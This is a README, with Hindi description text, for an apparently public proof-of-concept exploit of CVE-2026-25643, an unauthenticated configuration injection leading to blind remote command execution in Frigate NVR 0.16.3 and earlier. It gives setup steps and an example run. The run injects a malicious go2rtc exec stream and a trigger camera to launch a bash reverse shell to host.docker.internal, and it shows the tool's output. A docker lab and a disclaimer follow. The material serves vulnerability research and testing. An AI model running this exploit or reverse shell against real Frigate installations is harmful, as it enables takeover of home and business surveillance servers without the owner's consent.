
CVE-2026-25643: Frigate ≤0.16.3 Blind RCE via go2rtc exec injection
यह Python शोषण Frigate NVR संस्करण 0.16.3 तक के एक महत्वपूर्ण कॉन्फ़िगरेशन हेरफेर भेद्यता को लक्षित करता है (प्रमाणित और अप्रमाणित दोनों पथ)। एक दुर्भावनापूर्ण go2rtc स्ट्रीम और एक नकली कैमरा प्रविष्टि इंजेक्ट करके, यह सेवा पुनःआरंभ के दौरान Frigate प्रक्रिया के रूप में मनमाना कमांड निष्पादन को ट्रिगर करता है — बिना किसी रिवर्स शेल या आउटपुट कैप्चर की आवश्यकता के।
[!नोट] परियोजना निर्भरताओं के लिए एक स्वच्छ और पृथक वातावरण सुनिश्चित करने के लिए, Python के
venvमॉड्यूल का उपयोग करने की अनुशंसा की जाती है।
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/
Target : http://localhost:5001
Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)
============================================================
Payload sent! Command should execute during go2rtc init / camera probe.
Keep in mind:
• Output is NOT captured (blind execution)
• Command runs as the user/frigate process
• Multiple executions may occur during restart
============================================================
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।